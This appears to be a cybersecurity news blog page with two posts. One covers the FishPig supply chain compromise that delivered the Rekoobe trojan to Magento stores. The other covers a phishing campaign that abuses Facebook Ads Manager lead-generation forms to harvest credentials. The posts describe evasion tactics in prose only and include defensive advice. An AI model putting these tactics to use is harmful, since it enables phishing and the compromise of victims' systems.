Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Sites. Show all posts

Malware Spreads Through FishPig Distribution Server to Infect Magento-Powered Stores

 

For several weeks, Magento stores have been infected with malware as a result of a supply chain attack on the FishPig distribution server. FishPig specialises in Magento optimizations and Magento-WordPress integrations, and its Magento extensions have received over 200,000 downloads. FishPig issued a warning on Tuesday about an intrusion into its extension licence system that resulted in a threat actor injecting malicious PHP code into the Helper/License.php file. 

“This file is included in most FishPig extensions so it is best to assume that all FishPig modules had been infected,” FishPig announced.

The hackers likely had access to the company's servers since at least August 6, according to the company. As per Sansec security researchers who discovered the intrusion, the injected code would install another piece of malware called Rekoobe, which would hide as a background process on the compromised servers.

Sansec further told that the malicious code injected into License.php would download a Linux binary from license.fishpig.co.uk every time the Fishpig control panel is accessed in the Magento backend. The downloaded file, named 'lic.bin,' appears to be a licenced asset, but it is actually the Rekoobe remote access trojan.

The trojan removes all malicious files from the infected machine after execution, but it remains in memory, impersonating a system service while waiting for instructions from its command and control (C&C) server, according to the researchers. FishPig claims that the malicious code has been removed from its servers and that all modules have been updated.

“It is recommended to upgrade all FishPig modules or reinstall existing versions from the source, regardless of whether or not you are using extensions known to be infected. This will ensure clean and secure code on your system,” FishPig announced.

Attackers Abuse Facebook Ad Manager in Credential-Harvesting Campaign

 

Attackers are capitalising on the power of the Facebook brand by sending emails that appear to be from Facebook Ads Manager. The plan is to trick victims into providing their credentials and credit card information on a Facebook lead generation form. 

According to a report published on Tuesday by Avanan's security research team, attackers are sending phishing messages that seem to be urgent warnings from Meta's "Facebook AdManager" team. The messages claim that the victim is not following the company's ad policies and that the ad account will be terminated if the target does not appeal to the fictional violation. 

The "appeal form" link takes visitors to a credential-harvesting site that collects passwords and credit card information using a real Facebook lead-generation form.

An intriguing aspect of the campaign is that, rather than using a harvesting site hosted on a suspect IP somewhere, attackers are exploiting the Facebook ads system to create malicious lead-generation forms. This method kills two birds with one stone: For starters, it deceives many automated checks for malicious links used by email platforms. The Avanan team refers to using legitimate sites as the Static Expressway.

Jeremy Fuchs, cybersecurity researcher for Avanan explained in the report, "Hackers are leveraging sites that appear on static Allow Lists. That means that email security services have broadly decided that these sites are trustworthy, and thus anything related to them comes through to the inbox."

Furthermore, using Facebook Ads forms provides a high level of realism for any of Facebook's eight billion advertising users who are already familiar with the Ads Manager platform and the lead-generation forms it generates.

"For the end user, seeing that their Facebook ad account has been suspended is cause for concern," Fuchs said. "Since it’s a legitimate Facebook link, the user would feel confident continuing on."

While the sites used in this credential harvesting campaign appeared to be legitimate, Fuchs discovered a red flag in the phishing messages: These are typically sent from Outlook accounts such as pageguidelinesfacebook@outlook.com.

Furthermore, the physical address footer in the emails is incorrect. However, if users did not notice these details, they could easily be duped by this hoax. According to earlier this year's research, brand impersonations, or brandjacking, like these elevated by 274% last year as attackers continue to peddle their scams by appearing to come from trustworthy sources. Facebook is a popular platform for phishers to imitate. 

According to a Vade report released this spring, Facebook was the most impersonated brand last year, edging out perennial favourite Microsoft for the top spot. Email attacks increased by 48% in the first half of 2022, as per Abnormal Security research, with more than one in ten attacks impersonating well-known brands. So far in 2022, 256 individual brands have been impersonated, with LinkedIn and Microsoft appearing to be the favourites.